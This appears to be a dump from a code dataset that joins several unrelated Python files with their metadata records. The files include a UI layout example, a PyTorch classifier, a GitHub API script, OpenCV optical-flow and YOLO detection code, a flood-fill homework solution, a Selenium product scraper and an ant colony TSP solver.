super(ExpandingComponentExample, self).__init__()\n self.setSpacing(True)\n layout = HorizontalLayout()\n layout.setWidth('100%')\n self.addComponent(layout)\n naturalButton = Button('Natural')\n naturalButton.setDescription(\"This button does not have an explicit size - instead, its size depends on it's content - a.k.a natural size.\")\n layout.addComponent(naturalButton)\n expandedButton = Button('Expanded')\n expandedButton.setWidth('100%')\n expandedButton.setDescription('The width of this button is set to 100% and expanded, and will thus occupy the space left over by the other components.')\n layout.addComponent(expandedButton)\n layout.setExpandRatio(expandedButton, 1.0)\n sizedButton = Button('Explicit')\n sizedButton.setWidth('150px')\n sizedButton.setDescription('This button is explicitly set to be 150 pixels wide.')\n layout.addComponent(sizedButton)\n layout = HorizontalLayout()\n layout.setWidth('100%')\n self.addComponent(layout)\n naturalButton = Button('Natural')\n naturalButton.setDescription(\"This button does not have an explicit size - instead, its size depends on it's content - a.k.a natural size.\")\n layout.addComponent(naturalButton)\n expandedButton1 = Button('Ratio 1.0')\n expandedButton1.setWidth('100%')\n expandedButton1.setDescription('The width of this button is set to 100% and expanded with a ratio of 1.0, and will in this example occupy 1:3 of the leftover space.')\n layout.addComponent(expandedButton1)\n layout.setExpandRatio(expandedButton1, 1.0)\n expandedButton2 = Button('Ratio 2.0')\n expandedButton2.setWidth('100%')\n expandedButton2.setDescription('The width of this button is set to 100% and expanded with a ratio of 2.0, and will in this example occupy 2:3 of the leftover space.')\n layout.addComponent(expandedButton2)\n layout.setExpandRatio(expandedButton2, 2.0)","sub_path":"pycfiles/Muntjac-1.1.2-py2.7/ExpandingComponentExample.py","file_name":"ExpandingComponentExample.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"229268594","text":"import torch\nfrom torch import nn\nfrom ffnn import FFNN\n\nclass BOW_FFNN(nn.Module):\n def __init__(self, embeddings, hidden_size, output_size, freeze = True):\n super(BOW_FFNN,self).__init__()\n self.voca_size,self.input_size = embeddings.size()\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.freeze = freeze\n self.bow = nn.EmbeddingBag.from_pretrained(embeddings,self.freeze,mode='mean')\n self.ffnn = FFNN(self.input_size,self.hidden_size,self.output_size)\n\n def forward(self,input):\n return nn.functional.log_softmax(self.ffnn(self.bow(input,torch.LongTensor([0]))))","sub_path":"Trash/00QuestionClassifier/bow_ffnn.py","file_name":"bow_ffnn.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"127187968","text":"# 1. Посмотреть документацию к API GitHub, разобраться как вывести список репозиториев\n# для конкретного пользователя, сохранить JSON-вывод в файле *.json.\n\nimport requests\nimport json\n\nusername = input(\"Введите имя пользователя на github:\")\n\n\nmain_link = 'https://api.github.com/users'\n\nresponse = requests.get(f'{main_link}/{username}/repos')\ndata = json.loads(response.text)\n\nrepo_names = {}\n\nfor i in data:\n repo_names[data.index(i)] = i['name']\n\nprint(repo_names)\n\nwith open(\"repos.json\", \"w\") as f:\n json.dump(repo_names,f)\n\n","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"614144052","text":"import cv2 as cv\nimport numpy as np\n#import dronekit as dk\n#import dronekit_sitl\n#from pymavlink import mavutil\nimport time\nfrom time import gmtime, strftime\nimport os\n\n\ndef arm_and_takeoff(aTargetAltitude):\n print(\"Basic pre-arm checks\")\n while not vehicle.is_armable:\n print(\" Waiting for vehicle to initialise...\")\n time.sleep(1)\n\n print(\"Arming motors\")\n vehicle.mode = dk.VehicleMode(\"GUIDED\")\n vehicle.armed = True\n while not vehicle.armed:\n print(\" Waiting for arming...\")\n time.sleep(1)\n\n print(\"Taking off!\")\n vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude\n while True:\n print(\" Altitude: \", vehicle.location.global_relative_frame.alt)\n if vehicle.location.global_relative_frame.alt >= aTargetAltitude * 0.95:\n print(\"Reached target altitude\")\n break\n time.sleep(1)\n\n\ndef send_ned_velocity(velocity_x, velocity_y, velocity_z):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, # time_boot_ms (not used)\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_FRAME_BODY_NED, # frame\n 0b0000111111000111, # type_mask (only speeds enabled)\n 0, 0, 0, # x, y, z positions (not used)\n velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s\n 0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)\n 0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n\ndef goto_position_target_local_ned(north, east, down):\n msg = vehicle.message_factory.set_position_target_local_ned_encode(\n 0, # time_boot_ms (not used)\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_FRAME_BODY_NED, # frame\n 0b0000111111111000, # type_mask (only positions enabled)\n north, east, down, # x, y, z positions (or North, East, Down in the MAV_FRAME_BODY_NED frame\n 0, 0, 0, # x, y, z velocity in m/s (not used)\n 0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)\n 0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)\n # send command to vehicle\n vehicle.send_mavlink(msg)\n vehicle.flush()\n\n\ndef draw_flow(img, flow, step=8):\n h, w = img.shape[:2]\n y, x = np.mgrid[step / 2:h:step, step / 2:w:step].reshape(2, -1).astype(int)\n\n fx, fy = flow[y, x].T\n\n lines = np.vstack([x, y, x + fx, y + fy]).T.reshape(-1, 2, 2)\n lines = np.int32(lines + 0.5)\n vis = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n for (x1, y1), (x2, y2) in lines:\n #if ((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2)) ** 0.5 > 35:\n if abs(x1 - x2) > 10 and abs(y1 - y2) > 10 :\n cv.circle(vis, (x1, y1), 15, (0, 0, 255), -1)\n cv.circle(vis, (x2, y2), 15, (0, 0, 255), -1)\n\n # cv.polylines(vis, lines, 0, (0, 255, 0))\n\n return vis\n\n\ndef draw_flow_orig(img, flow, step=16):\n h, w = img.shape[:2]\n y, x = np.mgrid[step/2:h:step, step/2:w:step].reshape(2,-1).astype(int)\n\n fx, fy = flow[y,x].T\n\n lines = np.vstack([x, y, x+fx, y+fy]).T.reshape(-1, 2, 2)\n lines = np.int32(lines + 0.5)\n vis = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n cv.polylines(vis, lines, 0, (0, 255, 0))\n for (x1, y1), (_x2, _y2) in lines:\n cv.circle(vis, (x1, y1), 1, (0, 255, 0), -1)\n return vis\n\n\ndef recording_setup_Windows(dir_original, dir_opt_flow):\n time_stamp = strftime(\"%Y-%m-%d_%H_%M_%S\", time.localtime(time.time()))\n\n #file_test = open(os.path.join(dir_original, 'original_' + time_stamp + '.avi'), 'w')\n #file_test.write(\"Hello\")\n #file_test.close()\n fourcc = cv.VideoWriter_fourcc(*'XVID')\n out_original = cv.VideoWriter(os.path.join(dir_original, 'original_' + time_stamp + '.avi'), fourcc, 8.0, (640, 480))\n out_opt_flow = cv.VideoWriter(os.path.join(dir_opt_flow, 'opt_flow' + time_stamp + '.avi'), fourcc, 8.0,\n (640, 480)) # set file to write processed frames with optical flow\n # out_original = cv.VideoWriter('original_' + time_stamp + '.avi', fourcc, 8.0,(640, 480))\n # out_opt_flow = cv.VideoWriter( 'opt_flow_' + time_stamp + '.avi', fourcc, 8.0,(640, 480))\n # changed FPS from 20 to 8\n return out_original, out_opt_flow\n\ndef make_decision_Areas_method(new_frame):\n frame_HSV = cv.cvtColor(new_frame, cv.COLOR_BGR2HSV) # convert to HSV\n frame_threshold = cv.inRange(frame_HSV, (0, 58, 140), (57, 255, 255))\n ret, thresh = cv.threshold(frame_threshold, 50, 255, cv.THRESH_BINARY)\n contours, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n #print ( len(contours) )\n areas = []\n centers = []\n for contour in contours:\n areas.append( cv.contourArea(contour) )\n\n x, y, w, h = cv.boundingRect(contour) # then coordinate and height and width of the bounding box\n centers.append( x + (w/2))\n cv.rectangle(new_frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n\n if ( len(contours) ) >= 5 and max(areas) > 5000:\n if np.median(centers) <= 320:\n decision = \"left\"\n print(\"turn left\")\n if np.median(centers) > 320:\n decision = \"right\"\n print(\"turn right\")\n else:\n decision = \"0\"\n\n return decision\n\n# END of definitions\n\n\n# RECORDING VIDEO SETUP\ndir_original = 'ORIGINAL' #\ndir_opt_flow = 'OPT_FLOW'\n\nout_original, out_opt_flow = recording_setup_Windows(dir_original, dir_opt_flow)\n\ncam = cv.VideoCapture(0)\n\nret, prev = cam.read() #Reads a frame from camera\nh, w = prev.shape[:2] # gets height and width of the image (in pixels)\nprevgray = cv.cvtColor(prev, cv.COLOR_BGR2GRAY) # converts image to grayscale (needed for processing)\n\nfr_count = 0\nwhile True:\n fr_count += 1\n ret, img = cam.read(0) # reads NEXT frame from camera (because we need both prevoius and next to analyze flow)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n flow = cv.calcOpticalFlowFarneback(prevgray, gray, None, 0.6, 5, 15, 3, 5, 1.2, 0)\n #if fr_count == 1:\n #print(len(flow[0]))\n #flow is the array that contains x and y displacements of ALL the pixels. if no movements, displacements are 0\n # you can see that to get the flow, we need to pass 2 images - prevgray and gray\n prevgray = gray #now \"current\" image becomes \"prevoius\"\n new_frame = draw_flow(gray, flow) # this one just creates image with green dots on it, for illustration purposes\n\n make_decision_Areas_method(new_frame)\n\n # if max(ldx) > threshold: #because it's LEFT half of image, we should avoif if there is rightwardward movement (positive displacement)\n # print(\"turn right\")\n # cv.putText(new_frame, \"turn right!\", (10, 50), cv.FONT_HERSHEY_PLAIN, 3, (255, 255, 255))\n #\n #\n # if min(ldx) < threshold * (-1):#because it's right half of image, we should avoif if there is leftward movement (negative displacement)\n # print(\"turn left\")\n # cv.putText(new_frame, \"turn left!\", (400, 50), cv.FONT_HERSHEY_PLAIN, 3, (255, 255, 255))\n#----------------------------------------------------------------------------------------------------\n out_original.write(img)\n out_opt_flow.write(new_frame)\n #out.write(new_frame)\n cv.imshow(\"OpticalFlow\", new_frame) #displaying image with flow on it, for illustration purposes\n #cv.imshow(\"Original\", img)\n #cv.imwrite('frame' + str(fr_count) + '.jpg', new_frame)\n\n key = cv.waitKey(30)\n if key == ord('q'):\n out_opt_flow.release()\n out_original.release()\n break\n\nprint(\"Landing\")\n\n","sub_path":"Area_An_No_Drone.py","file_name":"Area_An_No_Drone.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"461196892","text":"'''\r\n\r\nDefiniamo adiacenti di un pixel p di un immagine i pixel adiacenti a p in orizzontale o in verticale.\r\nSe un pixel e' sul bordo dell'immagine il suo vicinato non comprende i pixel non contenuti nell'immagine.\r\nIl pixel dell'immagine con coordinate(x,y) ha dunque come adiacenti i pixel \r\ncon coordinate (x-1,y),(x+1,y),(x,y-1),(x,y+1) appartenenti all'immagine. \r\n \r\nDefiniamo connessi due pixel se e' possibile dall'uno raggiungere l'altro spostandosi solo su \r\npixel adiacenti e dello stesso colore (ovviamente perche' cio' sia possobile e' necessario \r\nche i due pixel abbiano lo stesso colore).\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione ricolora(fname, lista, fnameout) che presi:\r\n- il percorso di un file che contiene un'immagine in formato PNG\r\n- una lista di quadruple del tipo (x,y,c1,c2) dove x e y sono coordinate di un pixel dell'immagine e c1 e c2 due triple colore RGB\r\n- il percorso di un file (fnameout) da creare\r\nlegge l'immagine in fname, esegue un'operazione di ricolorazione di alcuni pixel dell'immagine e \r\nregistra l'immagine ricolorata nel file fnameout.\r\n\r\nL'operazione di ricolorazione e' la seguente. Per ciascuna delle quadruple (x,y,c1,c2) della lista (nell'ordine), \r\n- tutti i pixel connessi al pixel di coordinate (x,y) nell'immagine vanno ricolorati col colore c1, \r\n- tutti i pixel del perimetro (che si trovano sul 'bordo') della zona che si e' appena colorata devono essere ricolorati col colore c2.\r\nIl perimetro della zona colorata è l'insieme dei pixel che non hanno tutti e 4 i vicini che fanno parte della zona ricolorata \r\n(ovvero almeno uno è di un colore diverso da quello che si sta ricolorando oppure almeno uno non esiste perchè sarebbe fuori dall'immagine)\r\n\r\nSi consideri ad esempio l'immagine 'I1.png', l'invocazione di ricolora('I1.png',[(10,10,(255,0,0), (0,0,255))],’OUT1.png')\r\nprodurra' l'immagine 'OUT1.png' identica all'immagine di partenza se non per il fatto che,\r\n tutti i pixel adiacenti al pixel di coordinate (10,10) (e di colore verde), verranno ricolorati \r\n di rosso ((255,0,0)), mentre i pixel sul bordo della zona inizialmente verde vengono ricolorati di blu.\r\n\r\nPer ciascuna area ricolorata bisogna inoltre calcolare area interna e perimetro, che sono definite come segue:\r\n- l'area interna e' il numero di pixel ricolorati con il colore c1\r\n- il perimetro è il numero di pixel ricolorati con il colore c2\r\n\r\nLa funzone deve tornare la lista di coppie (area interna, perimetro) nello stesso ordine in cui sono state colorate le aree.\r\n \r\nPer altri esempi vedere il file grade03.txt \r\n'''\r\n\r\nfrom immagini import *\r\n\r\ndef apri_file(fname):\r\n img=load(fname)\r\n return img\r\n\r\ndef colora_vicini(img,img2,x,y,col_pixel,col_nuovo):\r\n area=0\r\n if (y+1)=0:\r\n if img2[y-1][x]==col_pixel:\r\n img[y-1][x]=col_nuovo\r\n area+=1\r\n if (x+1)=0:\r\n if img2[y][x-1]==col_pixel:\r\n img[y][x-1]=col_nuovo\r\n area+=1\r\n return area\r\n\r\ndef trov_estr(img,x,y,col):\r\n for c in range(0,len(img[0])):\r\n if (x+c)=0:\r\n if img[y-1][h]==c1:\r\n img[y-1][h]=c2\r\n y-=1\r\n perimetro+=1\r\n else:\r\n break\r\n while x-1>=0:\r\n if img[l][x-1]==c1:\r\n img[l][x-1]=c2\r\n x-=1\r\n perimetro+=1\r\n else:\r\n break\r\n for i in range(0,l+1):\r\n if (cor_y+i)=0:\r\n if img[cor_y-k][x]==c1:\r\n img[cor_y-k][x]=c2\r\n perimetro+=1\r\n \r\n for g in range(0,h+1):\r\n if (cor_x+g)=0:\r\n if img[y][cor_x-j]==c1:\r\n img[y][cor_x-j]=c2 \r\n perimetro+=1\r\n return perimetro\r\n\r\n\r\n \r\n \r\ndef ricolora(fname, lista, fnameout):\r\n '''Implementare qui la funzione'''\r\n img=apri_file(fname)\r\n img2=img.copy()\r\n ris=[] \r\n for i in range(0,len(lista)):\r\n area=0\r\n perimetro=0\r\n x=lista[i][0]\r\n y=lista[i][1]\r\n col_nuovo=lista[i][2]\r\n col_bordo=lista[i][3]\r\n col_pixel=img[y][x]\r\n fine_c,fine_r=trov_estr(img,x,y,col_pixel)\r\n area+=colora_vicini(img,img2,x,y,col_pixel,col_nuovo)\r\n for n in range(0,len(img)):\r\n area-=colora_vicini(img,img2,x,y,col_pixel,col_nuovo)\r\n if (y+n)< fine_r:\r\n area+=colora_vicini(img,img2,x,y+n,col_pixel,col_nuovo)\r\n \r\n for m in range(0,len(img[0])):\r\n if (x+m)<=fine_c:\r\n area+=colora_vicini(img,img2,x+m,y+n,col_pixel,col_nuovo)\r\n area-=colora_vicini(img,img2,x+m,y,col_pixel,col_nuovo)\r\n \r\n if (x-m)>=0:\r\n area+=colora_vicini(img,img2,x-m,y+n,col_pixel,col_nuovo)\r\n area-=colora_vicini(img,img2,x-m,y,col_pixel,col_nuovo)\r\n \r\n if (y-n)>=0:\r\n area+=colora_vicini(img,img2,x,y-n,col_pixel,col_nuovo)\r\n\r\n for m in range(0,len(img[0])):\r\n if (x+m)<=fine_c:\r\n area+=colora_vicini(img,img2,x+m,y-n,col_pixel,col_nuovo)\r\n \r\n area-=colora_vicini(img,img2,x+m,y,col_pixel,col_nuovo)\r\n if (x-m)>=0:\r\n area+=colora_vicini(img,img2,x-m,y-n,col_pixel,col_nuovo)\r\n \r\n area-=colora_vicini(img,img2,x-m,y,col_pixel,col_nuovo)\r\n perimetro=colora_bordo(img,x,y,fine_c,fine_r,col_nuovo,col_bordo)\r\n a=area-perimetro\r\n ris+=[(a,perimetro)]\r\n save(img,fnameout)\r\n return ris\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n","sub_path":"students/1743829/homework03/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"193818154","text":"# Section 06-2\r\n# Selenium\r\n# Selenium 사용 실습(2) - 실습 프로젝트(1)\r\n\r\n# selenium 임포트\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom bs4 import BeautifulSoup\r\nfrom io import BytesIO\r\nimport urllib.request as req\r\nimport time\r\nimport xlsxwriter\r\n\r\n\r\n\r\nchrome_options = Options()\r\nchrome_options.add_argument(\"--headless\")\r\n\r\n# 엑셀 처리 선언\r\nworkbook = xlsxwriter.Workbook('D:/crawl-test/crawling_results.xlsx')\r\n\r\n# 워크 시트\r\nworksheet = workbook.add_worksheet()\r\n\r\n# webdriver 설정(Chrome, Firefox 등) - Headless 모드\r\nbrowser = webdriver.Chrome('./webdriver/chromedriver.exe', options = chrome_options)\r\n# webdriver 설정(Chrome, Firefox 등) - 일반 모드\r\n# browser = webdriver.Chrome('./webdriver/chromedriver.exe')\r\n\r\n# 크롬 브라우저 내부 대기\r\nbrowser.implicitly_wait(3)\r\n\r\n# 브라우저 사이즈\r\nbrowser.set_window_size(1920, 1080) # maximize_window() minimize_window()\r\n\r\n# 페이지 이동\r\nbrowser.get('http://prod.danawa.com/list/?cate=112758&15main_11_02')\r\n\r\n# 1차 페이지 내용\r\n# print('Before Page Contents : {}'.format(browser.page_source))\r\n\r\n# 제조사별 더 보기 클릭 1\r\n# Explicitly wait\r\nWebDriverWait(browser, 3).until(EC.presence_of_element_located((By.XPATH,'//*[@id=\"dlMaker_simple\"]/dd/div[2]/button[1]'))).click()\r\n\r\n# 제조사별 더 보기 클릭 2\r\n# time.sleep(2)\r\n# browser.find_element_by_xpath('//*[@id=\"dlMaker_simple\"]/dd/div[2]/button[1]').click()\r\n\r\n# 원하는 모델 카테고리 클릭\r\nWebDriverWait(browser, 2).until(EC.presence_of_element_located((By.XPATH,'//*[@id=\"selectMaker_simple_priceCompare_A\"]/li[12]/label'))).click()\r\n\r\n# 2차 페이지 내용\r\n# print('After Page Contents : {}'.format(browserlget_source))\r\n\r\ntime.sleep(3)\r\n\r\n# 현재 페이지 \r\ncur_page = 1\r\n\r\n# 크롤링 페이지\r\ntarget_crawl_num = 3\r\n\r\n# 엑셀 행 수\r\ninsert_cnt = 1\r\n\r\nwhile cur_page <= target_crawl_num:\r\n\r\n # bs4 초기화\r\n soup = BeautifulSoup(browser.page_source, 'html.parser')\r\n\r\n # 소스 코드 정리\r\n # print(soup.prettify())\r\n\r\n # 메인 상품 리스트 선택\r\n pro_list = soup.select('div.main_prodlist.main_prodlist_list > ul > li') \r\n\r\n\r\n # 현재 페이지 확인\r\n print(\"현재 페이지 : {}\".format(cur_page))\r\n print()\r\n\r\n # 필요 정보 추출\r\n for v in pro_list:\r\n if not v.find('div', class_ = \"ad_header\"):\r\n\r\n prod_name = v.select('p.prod_name > a')[0].text.strip()\r\n prod_price = v.select('p.price_sect > a')[0].text.strip()\r\n\r\n # 이미지\r\n img_data = BytesIO(req.urlopen(v.select('a.thumb_link > img')[0]['data-original']).read())\r\n\r\n # print(v.select('p.prod_name > a')[0].text.strip())\r\n # print(v.select('a.thumb_link > img')[0]['src'])\r\n # print(v.select('p.price_sect > a')[0].text.strip())\r\n\r\n # 엑셀 저장(텍스트)\r\n worksheet.write('A%s'% insert_cnt, prod_name)\r\n worksheet.write('B%s'% insert_cnt, prod_price)\r\n # 엑셀 저장(이미지)\r\n worksheet.insert_image('C%s'% insert_cnt, prod_name, {'image_data' : img_data})\r\n\r\n insert_cnt += 1\r\n\r\n print()\r\n print()\r\n\r\n # 페이지 별 스크린 샷 저장\r\n browser.save_screenshot('D:/crawl-test/target-page{}.png'.format(cur_page))\r\n\r\n # 페이지 증가\r\n cur_page += 1\r\n\r\n if cur_page > target_crawl_num:\r\n print('종료')\r\n break\r\n\r\n # 페이지 이동\r\n WebDriverWait(browser, 3).until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.number_wrap > a:nth-child({})'.format(cur_page)))).click()\r\n\r\n # BeautifulSoup 인스턴스 삭제\r\n del soup\r\n\r\n # 3초 대기\r\n time.sleep(3)\r\n\r\n \r\n\r\n# 브라우저 종료\r\nbrowser.quit()\r\n\r\n# 엑셀 파일 닫기\r\nworkbook.close()","sub_path":"section06-2.py","file_name":"section06-2.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"338840354","text":"from threading import Thread\n\na = 0\n\n\ndef function(arg):\n global a\n for _ in range(arg):\n a += 1\n\n\ndef main():\n threads = []\n for i in range(5):\n thread = Thread(target=function, args=(1000000,))\n thread.start()\n threads.append(thread)\n\n [t.join() for t in threads]\n print(\"----------------------\", a) # ???\n\n\nmain()","sub_path":"tread_handling.py","file_name":"tread_handling.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"551055956","text":"import numpy as ny\nimport random\nimport matplotlib.pyplot as plt\nfrom numba import jit\n\n''' 蚁群算法求解TSP问题'''\n\n\n# 蚁群优化算法\nclass AntOptimization:\n # 城市个数\n __city_count = 0\n # 城市集合\n __city_set = 0\n # 蚂蚁个数\n __ant_count = 0\n # 城市距离矩阵\n __city_distance = 0\n # 信息素矩阵\n __city_message = 0\n # 蚂蚁路径集合\n __ants = 0\n # 最优蚂蚁路径\n __bast_ant = 0\n # 停滞计数器\n __loop_count = 0\n # 最大停滞次数\n __max_loop_times = 100\n # 信息素最小值\n __min_message = 0.01\n # 信息素最大值\n __max_message = 100\n # 蚂蚁倍数\n __ant_power = 0.5\n # 选择信息素权重\n __message_weight = 1\n # 选择城市距离权重\n __distance_weight = 1\n\n # 初始化\n def __init__(self, city_count=30):\n _data = [(41, 94), (37, 84), (54, 67), (25, 62), (7, 64),\n (2, 99), (68, 58), (71, 44), (54, 62), (83, 69),\n (64, 60), (18, 54), (22, 60), (83, 46), (91, 38),\n (25, 38), (24, 42), (58, 69), (71, 71), (74, 78),\n (87, 76), (18, 40), (13, 40), (82, 7), (62, 32),\n (58, 35), (45, 21), (41, 26), (44, 35), (4, 50)\n ]\n if city_count == 30:\n self.__city_set = ny.asarray(_data).T\n else:\n self.__city_set = ny.random.randint(1, 50, [2, city_count])\n print(self.__city_set)\n self.__city_count = city_count\n self.__ant_count = int(city_count * self.__ant_power)\n self.__city_distance = ny.zeros([self.__city_count, self.__city_count], dtype=float) * 10\n self.cal_distance()\n self.__city_message = ny.ones([self.__city_count, self.__city_count], dtype=float) * self.__min_message\n self.__ants = ny.zeros([self.__ant_count, self.__city_count], dtype=int)\n self.__bast_ant = ny.arange(city_count)\n self.draw(save_times=-1, save_ant=-1)\n\n # 计算两座城市距离\n def cal_distance(self):\n for i in range(self.__city_count):\n for j in range(self.__city_count):\n a = self.__city_set[:, i]\n b = self.__city_set[:, j]\n x = a[0] - b[0]\n y = a[1] - b[1]\n self.__city_distance[i, j] = ny.sqrt(x ** 2 + y ** 2)\n\n # 向路径添加信息素\n def add_message(self, ant_way, k=1):\n way = list(ant_way)\n for i in range(self.__city_count - 1):\n now_city = way[i]\n next_city = way[i + 1]\n self.__city_message[now_city, next_city] += k / self.__city_distance[now_city, next_city]\n if self.__city_message[now_city, next_city] > self.__max_message:\n self.__city_message[now_city, next_city] = self.__max_message\n elif self.__city_message[now_city, next_city] < self.__min_message:\n self.__city_message[now_city, next_city] = self.__min_message\n self.__city_message[next_city, now_city] = self.__city_message[now_city, next_city]\n\n # 第ant_index只蚂蚁选择下一个城市\n # 访问次数_visit\n # 未访问城市集合city\n def ant_select_city(self, ant_index, _visit, city):\n # 获取当前城市now_city\n now_city = self.__ants[ant_index, _visit - 1]\n # 选择每个城市的概率p_city\n p_city = ny.zeros(len(city), dtype=float)\n for i in range(len(city)):\n city_index = city[i]\n # 遍历城市集计算概率\n p_city[i] = ny.power(self.__city_message[now_city, city_index], self.__message_weight) * ny.power(\n (1 / self.__city_distance[now_city, city_index]), self.__distance_weight)\n '''\n # 随机锦标赛法选择下一个城市\n a = random.randint(0, len(city) - 1)\n b = random.randint(0, len(city) - 1)\n if p_city[a] > p_city[b]:\n next_city = a\n else:\n next_city = b\n '''\n # 不加随机算法了\n # 直接选择最好的城市\n # (′д` )…彡…彡\n _city = list(p_city)\n next_city = _city.index(max(_city))\n next_city = city[next_city]\n self.__ants[ant_index, _visit] = next_city\n self.__city_message[now_city, next_city] += 1 / self.__city_distance[now_city, next_city]\n if self.__city_message[now_city, next_city] > self.__max_message:\n self.__city_message[now_city, next_city] = self.__max_message\n elif self.__city_message[now_city, next_city] < self.__min_message:\n self.__city_message[now_city, next_city] = self.__min_message\n self.__city_message[next_city, now_city] = self.__city_message[now_city, next_city]\n\n # 第ant_index只蚂蚁选择路径\n def ant_select(self, ant_index, _visit):\n if _visit == 0:\n # 第一次随机选择起点\n random_city = random.randint(0, self.__city_count - 1)\n self.__ants[ant_index, _visit] = random_city\n else:\n # 计算剩余城市集合city\n city = range(self.__city_count)\n city = [x for x in city if x not in self.__ants[ant_index, 1:_visit]]\n # city.remove(self.__ants[ant_index, 1:_visit])\n # 选取下一个城市\n self.ant_select_city(ant_index, _visit, city)\n\n # 计算路径长度\n def cal_length(self, _ants):\n _sum = 0\n _ants = list(_ants)\n _ants.append(_ants[0])\n for i in range(self.__city_count):\n now_city = _ants[i]\n next_city = _ants[i + 1]\n _sum += self.__city_distance[now_city, next_city]\n return _sum\n\n # 储存最优路径\n def save_ant(self, save_times=0):\n _bast = self.cal_length(self.__bast_ant)\n for i in range(self.__ant_count):\n _now = self.cal_length(self.__ants[i, :])\n if _now < _bast:\n self.__loop_count = 0\n _bast = _now\n self.__bast_ant = list(self.__ants[i, :])\n self.draw(save_times=save_times, save_ant=i)\n else:\n self.__loop_count += 1\n # 停滞次数到达阈值\n if self.__loop_count / self.__ant_count >= self.__max_loop_times:\n # 清空信息素\n print(\"clear\")\n self.__city_message *= 0\n self.__loop_count = 0\n\n # 运行\n def run(self, times):\n for now_time in range(times + 1):\n # 信息素挥发\n self.__city_message *= 0.7\n # 初始化蚂蚁路径\n self.__ants *= 0\n for city_visit in range(self.__city_count):\n # 访问第city_visit个城市\n for i in range(self.__ant_count):\n # 第i只蚂蚁选择路径\n self.ant_select(i, city_visit)\n for i in range(self.__ant_count):\n self.add_message(self.__ants[1, :], 1)\n print(\">>>{}\".format(now_time + 1))\n self.save_ant(save_times=now_time)\n # self.add_message(self.__bast_ant, 1)\n\n # 绘制结果\n def draw(self, save_times=0, save_ant=0, show=False):\n save_times += 1\n save_ant += 1\n draw_point = self.__city_set[:, self.__bast_ant]\n x = list(draw_point[0, :])\n y = list(draw_point[1, :])\n x.append(x[0])\n y.append(y[0])\n plt.plot(x, y)\n plt.title(self.cal_length(self.__bast_ant).__str__())\n plt.savefig(\"image\\\\times_\" + save_times.__str__() + \"_\" + save_ant.__str__())\n if show:\n plt.show()\n else:\n plt.close()\n\n\nant = AntOptimization(30)\nant.run(times=100)\n","sub_path":"Ant/Ant.py","file_name":"Ant.py","file_ext":"py","file_size_in_byte":7729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218710030","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nfrom itertools import combinations\r\n\r\nvideo_stream = cv2.VideoCapture(0)\r\ndef dist1(x, y):\r\n dist = math.sqrt((x**2)+ (y**2))\r\n return (dist)\r\n\r\nwhile True:\r\n ret, current_frame = video_stream.read()\r\n img_to_detect = current_frame\r\n img_height = img_to_detect.shape[0]\r\n img_width = img_to_detect.shape[1]\r\n\r\n img_blob = cv2.dnn.blobFromImage(img_to_detect, 0.003922, (416,416), swapRB=True, crop=False)\r\n class_labels = [\"person\", \"bicycle\", \"car\", \"motorcycle\", \"airplane\", \"bus\", \"train\", \"truck\", \"boat\",\r\n \"trafficlight\", \"firehydrant\", \"stopsign\", \"parkingmeter\", \"bench\", \"bird\", \"cat\",\r\n \"dog\", \"horse\", \"sheep\", \"cow\", \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\",\r\n \"umbrella\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\", \"skis\", \"snowboard\", \"sportsball\",\r\n \"kite\", \"baseballbat\", \"baseballglove\", \"skateboard\", \"surfboard\", \"tennisracket\",\r\n \"bottle\", \"wineglass\", \"cup\", \"fork\", \"knife\", \"spoon\", \"bowl\", \"banana\", \"apple\",\r\n \"sandwich\", \"orange\", \"broccoli\", \"carrot\", \"hotdog\", \"pizza\", \"donut\", \"cake\", \"chair\",\r\n \"sofa\", \"pottedplant\", \"bed\", \"diningtable\", \"toilet\", \"tvmonitor\", \"laptop\", \"mouse\",\r\n \"remote\", \"keyboard\", 